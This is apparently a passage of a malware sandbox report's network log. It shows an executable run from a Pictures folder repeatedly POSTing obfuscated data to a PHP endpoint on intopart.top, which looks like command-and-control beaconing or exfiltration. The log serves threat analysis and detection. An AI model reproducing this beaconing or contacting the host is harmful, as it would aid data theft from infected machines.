Apr 29, 2024 01:03:40.398134947 CEST	568	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cQ9KsYdLh1KryupajEMVcIqxLFBAz5egKXswubllSg8nXFRQBPjvdf3q4tkf4Ta8mVNH%2BQg1AVcBoiT8agk8qJqQeO5fSQxTZTXTkw75moFZfaP6YFT9N7Z2aVLLLyw%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafdab98c22c2-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:40.398168087 CEST	9	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:40.398183107 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49808	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:40.627022982 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:40.737124920 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:40.737370014 CEST	1080	OUT	Data Raw: 5d 5e 5f 58 55 5e 5e 53 54 56 50 51 5a 55 51 52 5b 52 5e 40 54 5f 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^_XU^^STVPQZUQR[R^@T_PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\1[8[ 2&=);#092(/'3(;Y)73&^' Z/!Z/(
Apr 29, 2024 01:03:41.161256075 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1wC3acwcP225yTkp%2FNdEX9TX28vXE3xv%2BGolu6zKFP5CMLaSU8fO%2BjLMy%2BgREYzE6JH1eFLHNEvxkDNnFbAukTnoj14rMQ7aKs5uePfKtXsI42xWyVVtIERKZTWzmUI%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafdf4ce7812d-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:41.161339045 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49809	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:41.399146080 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:41.509516954 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:41.509711027 CEST	1080	OUT	Data Raw: 58 5f 5a 5a 55 59 5e 53 54 56 50 51 5a 5e 51 53 5b 5c 5e 42 54 5f 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X_ZZUY^STVPQZ^QS[\^BT_PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'[&8_#28]%>]/$=8^>>(-W'S-/Y7 *^$ Z/!Z/
Apr 29, 2024 01:03:41.934927940 CEST	581	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9P4qQpZulu7ZqplQ7JfXMTL8Ht%2FpugWzYYQuRktRdPc1FQlti%2Br4O0JzG6QABxMHhByIfXAK0dFKxH594zN5tMAZaE6XYr2sP0dPD%2FaSOTr3C1tI08zol7aIVDw4ZwY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafe41c542daa-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:41.934956074 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49810	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:42.173024893 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:42.282902002 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:42.283159971 CEST	1080	OUT	Data Raw: 5d 5f 5a 5d 55 5e 5e 55 54 56 50 51 5a 5e 51 53 5b 5f 5e 43 54 59 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_Z]U^^UTVPQZ^QS[_^CTYPD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&$4\$>9-%V0<=:U?[/$#,;<943>Z&* Z/!Z/
Apr 29, 2024 01:03:42.675237894 CEST	578	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:42 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qlYCouI5vLhM%2FRW3Aj%2BDYLBVyEzY1Nm%2B09NJSRpkoxcCZ%2Ftx7H1h4L7GbCeBMglpBYzuMdIhBHHnCHNgIEUxqSGepreOs0hwyUef%2BliR8AtOPreer0XGTf%2FbDNxqHQA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafe8f98e123d-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:42.675283909 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49811	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:42.770606041 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1788 Expect: 100-continue
Apr 29, 2024 01:03:42.880490065 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:42.885026932 CEST	1788	OUT	Data Raw: 58 5e 5a 5e 55 56 5b 52 54 56 50 51 5a 57 51 5a 5b 5b 5e 46 54 5b 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X^Z^UV[RTVPQZWQZ[[^FT[PG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&.<_7#&.!;C/0==:>(+$T,"#Z&: Z/!Z/
Apr 29, 2024 01:03:43.279943943 CEST	746	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EMDOY096iQOiuWvmhu%2FeeXtcAQc6UcVxhfHLRg%2FOG2g%2B%2FMEVC3%2B9GTft2ajhzdgZLrJ0hZl0Y7ZKDpSi%2B%2FqPNnQQu9Ro5a8BSsw%2Bd6%2BWVn%2BiXGY%2FJP7zn96y95zeHDU%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafecac132d82-ORD alt-svc: h2=":443"; ma=60 Data Raw: 39 38 0d 0a 0e 12 20 5b 29 3b 21 53 29 31 32 55 24 1c 06 09 27 2c 38 0b 29 11 3a 41 32 33 0e 5c 2f 07 2d 0a 27 34 2c 5e 23 3a 30 13 31 08 2b 55 3c 0e 20 59 02 1c 39 43 26 2a 3e 11 32 3d 2b 14 28 0c 0b 59 35 00 2f 05 29 16 04 1b 30 11 26 00 3e 33 31 01 3c 29 01 09 3a 03 0f 5f 25 34 30 0e 3e 25 2c 52 08 13 20 1f 28 23 2b 0c 20 3b 2b 55 24 31 21 04 26 43 30 0e 35 16 20 54 2b 39 0a 5d 33 21 3d 02 31 0c 2a 51 3a 0a 20 19 37 02 2d 5b 24 17 21 5c 2f 02 20 49 0f 34 5d 53 0d 0a Data Ascii: 98 [);!S)12U$',8):A23\/-'4,^#:01+U< Y9C&>2=+(Y5/)0&>31<):_%40>%,R (#+ ;+U$1!&C05 T+9]3!=1Q: 7-[$!\/ I4]S
Apr 29, 2024 01:03:43.279992104 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.4	49812	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:42.906974077 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:43.017405033 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:43.017607927 CEST	1080	OUT	Data Raw: 5d 5e 5a 51 55 5d 5b 5f 54 56 50 51 5a 57 51 51 5b 5c 5e 40 54 58 50 42 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^ZQU][_TVPQZWQQ[\^@TXPB]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'%> 7;&),C+3='=):<>+P$'/#*' Z/!Z/
Apr 29, 2024 01:03:43.406375885 CEST	574	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mpnnlEvS03v3cnxUnSYV6D5dW4xYSC9ipmOaVOfBXVSGLw%2BOcVBmPW9FDqjr8ntxRchZr69T8XFclSD9Eg4f3pp%2B8RtG6Cmr3wE0MN8rqp5Xe4NHTNftvCZA%2Bbl%2FRIs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baafed8ccc6209-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:43.406466007 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.4	49813	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:43.648212910 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:43.758846998 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:43.759149075 CEST	1080	OUT	Data Raw: 58 5b 5f 5c 50 5a 5e 56 54 56 50 51 5a 55 51 57 5b 5b 5e 48 54 59 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X[_\PZ^VTVPQZUQW[[^HTYPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'&['42<_1-9/ P'[#)*>T+0& <-?4': Z/!Z/(
Apr 29, 2024 01:03:44.154586077 CEST	587	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GYCvPaNrCrh%2FhbkRImv405QXLo3Un%2BdAq1MjHFwxzG%2FmmWa%2BRiI7UwwFuPdoKcHvN76dIunEcBLsQaPsqDgEfcB5BDH2HBNA2BTyiHth3S6Wo%2F3MRD%2BzJQOKlaHbVxY%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaff228ea2335-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:44.154640913 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.4	49814	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:44.400692940 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:44.511266947 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:44.511449099 CEST	1080	OUT	Data Raw: 5d 5f 5a 5f 55 5c 5e 55 54 56 50 51 5a 5f 51 50 5b 59 5e 47 54 52 50 41 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]_Z_U\^UTVPQZ_QP[Y^GTRPA]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$2.0^#!01&,($-8_():V([/P'$;?=\ #=3 Z/!Z/
Apr 29, 2024 01:03:44.924441099 CEST	585	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:44 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cW9KFiy%2F0ndtJSAWYCLXJ4Gd4PTNwMChPIy2sPa8mkvM%2FnZ8W%2BBrSVQuOg5kVRvcE3Si1%2BoeOFRwvhKAsTS3MxCQ69WJ9l8HvUP9vfCdCKt8pyCEf1Kgck12%2BxPyxgs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaff6df4b290d-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:44.924521923 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.4	49815	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:45.164772987 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:45.274931908 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:45.275156021 CEST	1080	OUT	Data Raw: 58 5a 5a 5d 50 5c 5b 53 54 56 50 51 5a 53 51 5a 5b 5c 5e 47 54 5d 50 48 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XZZ]P\[STVPQZSQZ[\^GT]PH]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'Y'=41/%-&03> _*:R?($8-,%4-3 Z/!Z/0
Apr 29, 2024 01:03:45.666493893 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:45 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7wu%2FjQpreARNqyuCyYz6EP8lQviidu%2FD91TwIXtzhPreToKSkKC2A5rVY1W2BGe9jzgm0ncFj7LtcwkwryRGXF3voZdWzQkuoKNn9K%2Bm4kMyh%2BImv6JuQc91060zUs8%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87baaffba927018a-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:45.666522980 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.4	49816	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:45.900266886 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:46.010709047 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:46.010993004 CEST	1080	OUT	Data Raw: 5d 5e 5a 5f 55 57 5e 55 54 56 50 51 5a 54 51 53 5b 58 5e 43 54 5e 50 44 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: ]^Z_UW^UTVPQZTQS[X^CT^PD]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\2-(^#2/%9/$-$Y>!+W'0?S-,)X70*^&: Z/!Z/,
Apr 29, 2024 01:03:46.408499002 CEST	583	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:46 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HpcJrSf4JzWVTd7K%2BFK2TnRknexlE%2B4KktHxzqeVJ9ufuL9deQileKMx1MdeVGmHCHBXWOxumBM2x5k3673%2FsPHhjHJniE1WcwxDwep%2BLrdBdHrQj3Zge5xhV3eCTAM%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab0003f781b66-ORD alt-svc: h2=":443"; ma=60 Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a Data Ascii: 4<ZYT
Apr 29, 2024 01:03:46.408720970 CEST	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.4	49817	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:46.643316984 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:46.754026890 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:46.754205942 CEST	1080	OUT	Data Raw: 58 5a 5a 51 50 59 5b 57 54 56 50 51 5a 55 51 52 5b 53 5e 42 54 53 50 47 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: XZZQPY[WTVPQZUQR[S^BTSPG]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_'\28\ "0^2=",%$U3/>=?=Q3#+U,=[ "0 Z/!Z/(
Apr 29, 2024 01:03:47.140896082 CEST	580	IN	HTTP/1.1 200 OK Date: Sun, 28 Apr 2024 23:03:47 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1C1K%2FEZmci0Go%2BmNhsjFqsX3DcDMu1CZaozKOsogeXlh%2FuQECVgX4vAF9ySfAhWRP%2FtpcqX5rV0esO%2BinriNKkX%2F9z4CDflN%2BLpHMZVu3WIY1xiRuTBHKnvHGa2CDPA%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 87bab004ebc8617c-ORD alt-svc: h2=":443"; ma=60
Apr 29, 2024 01:03:47.140955925 CEST	14	IN	Data Raw: 34 0d 0a 3c 5a 59 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<ZYT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.4	49818	172.67.144.153	80	8064	C:\Users\Default\Pictures\XXPWErhsUbDrk.exe

Timestamp	Bytes transferred	Direction	Data
Apr 29, 2024 01:03:47.376698017 CEST	233	OUT	POST /Eternalpollgeocpu.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: intopart.top Content-Length: 1080 Expect: 100-continue
Apr 29, 2024 01:03:47.487276077 CEST	25	IN	HTTP/1.1 100 Continue
Apr 29, 2024 01:03:47.487468958 CEST	1080	OUT	Data Raw: 58 5c 5f 5b 50 5c 5b 5f 54 56 50 51 5a 5f 51 50 5b 5a 5e 40 54 5b 50 40 5d 56 5b 5c 54 5b 54 54 5a 45 5a 57 5e 58 52 5f 58 50 55 50 53 56 5f 5d 51 54 43 46 5d 5c 58 5d 5d 5b 54 5d 55 53 5a 5d 5a 5b 5e 5f 57 59 54 56 5a 5e 5f 58 42 52 5d 5a 55 58 Data Ascii: X\_[P\[_TVPQZ_QP[Z^@T[P@]V[\T[TTZEZW^XR_XPUPSV_]QTCF]\X]][T]USZ]Z[^_WYTVZ^_XBR]ZUX_VP\^Y[ZQUBSV\[\ZQUWBPY_DU\UX^^GQS_\VQVY^__R\_[SXPUT\A][_QY_^XUX\A_X^\ZZ]XZXTQ\PY\WQ]TW_VQQ_WT^_Y^YXZ_$&[# /%.=^/ T3-8[*"<303R,?940)0 Z/!Z/
